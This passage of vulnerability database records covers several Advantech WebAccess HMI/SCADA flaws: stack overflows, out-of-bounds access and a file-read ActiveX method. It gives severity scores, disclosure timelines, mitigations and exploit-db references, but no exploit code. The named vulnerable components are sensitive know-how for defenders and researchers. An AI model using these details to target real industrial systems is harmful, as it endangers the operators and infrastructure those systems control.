"@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-140", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-140", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C74 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strncpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3168", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-140", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ] }, "id": "VAR-201602-0481", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:08:05.975000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-140" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-140" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-140" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName strncpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-140" } ], "trust": 0.7 } }
var-201509-0433
Vulnerability from variot
Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors. WebAccess HMI/SCADA is software that provides remote control and management. Advantech WebAccess is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed attacks will likely cause denial-of-service conditions. Advantech WebAccess 8.0 and prior are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201509-0433", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.0.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "3.4.3" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "CNNVD", "id": "CNNVD-201509-141" }, { "db": "NVD", "id": "CVE-2014-9208" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-008125" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Praveen Darshanam", "sources": [ { "db": "BID", "id": "76672" } ], "trust": 0.3 }, "cve": "CVE-2014-9208", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2014-9208", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2015-05943", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "76ad3d10-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-77153", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-9208", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-9208", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2015-05943", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201509-141", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-77153", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-9208", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "VULHUB", "id": "VHN-77153" }, { "db": "VULMON", "id": "CVE-2014-9208" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "CNNVD", "id": "CNNVD-201509-141" }, { "db": "NVD", "id": "CVE-2014-9208" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors. WebAccess HMI/SCADA is software that provides remote control and management. Advantech WebAccess is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed attacks will likely cause denial-of-service conditions. \nAdvantech WebAccess 8.0 and prior are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2014-9208" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "BID", "id": "76672" }, { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-77153" }, { "db": "VULMON", "id": "CVE-2014-9208" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-77153", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38108", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-77153" }, { "db": "VULMON", "id": "CVE-2014-9208" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-9208", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-15-251-01", "trust": 2.6 }, { "db": "EXPLOIT-DB", "id": "38108", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201509-141", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2015-05943", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-008125", "trust": 0.8 }, { "db": "BID", "id": "76672", "trust": 0.5 }, { "db": "IVD", "id": "76AD3D10-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "133475", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-77153", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-15-251-01A", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-9208", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "VULHUB", "id": "VHN-77153" }, { "db": "VULMON", "id": "CVE-2014-9208" }, { "db": "BID", "id": "76672" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "CNNVD", "id": "CNNVD-201509-141" }, { "db": "NVD", "id": "CVE-2014-9208" } ] }, "id": "VAR-201509-0433", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "VULHUB", "id": "VHN-77153" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-05943" } ] }, "last_update_date": "2024-11-23T21:43:47.714000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2015-05943)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/63799" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-77153" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "NVD", "id": "CVE-2014-9208" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.6, "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-251-01" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/38108/" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9208" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9208" }, { "trust": 0.6, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://www.securityfocus.com/bid/76672" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-251-01a" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "VULHUB", "id": "VHN-77153" }, { "db": "VULMON", "id": "CVE-2014-9208" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "CNNVD", "id": "CNNVD-201509-141" }, { "db": "NVD", "id": "CVE-2014-9208" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2015-05943" }, { "db": "VULHUB", "id": "VHN-77153" }, { "db": "VULMON", "id": "CVE-2014-9208" }, { "db": "BID", "id": "76672" }, { "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "db": "CNNVD", "id": "CNNVD-201509-141" }, { "db": "NVD", "id": "CVE-2014-9208" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-09-11T00:00:00", "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "date": "2015-09-11T00:00:00", "db": "CNVD", "id": "CNVD-2015-05943" }, { "date": "2015-09-11T00:00:00", "db": "VULHUB", "id": "VHN-77153" }, { "date": "2015-09-11T00:00:00", "db": "VULMON", "id": "CVE-2014-9208" }, { "date": "2015-09-04T00:00:00", "db": "BID", "id": "76672" }, { "date": "2015-09-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "date": "2015-09-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-141" }, { "date": "2015-09-11T16:59:01.080000", "db": "NVD", "id": "CVE-2014-9208" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-09-11T00:00:00", "db": "CNVD", "id": "CNVD-2015-05943" }, { "date": "2017-09-16T00:00:00", "db": "VULHUB", "id": "VHN-77153" }, { "date": "2017-09-16T00:00:00", "db": "VULMON", "id": "CVE-2014-9208" }, { "date": "2015-11-03T19:36:00", "db": "BID", "id": "76672" }, { "date": "2015-09-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008125" }, { "date": "2015-09-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-141" }, { "date": "2024-11-21T02:20:24.253000", "db": "NVD", "id": "CVE-2014-9208" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201509-141" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Unspecified DLL File stack-based buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-008125" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "76ad3d10-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201509-141" } ], "trust": 0.8 } }
var-201708-1702
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-532", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-532", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4073", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-532", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ] }, "id": "VAR-201708-1702", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:10:31.079000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-532", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-532", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-532", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media SetMDInterval Out-Of-Bounds Access Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-532" } ], "trust": 0.7 } }
var-201404-0547
Vulnerability from variot
The OpenUrlToBufferTimeout method in the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a file: URL. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-138" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" }, { "db": "CNNVD", "id": "CNNVD-201404-177" }, { "db": "NVD", "id": "CVE-2014-0772" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { 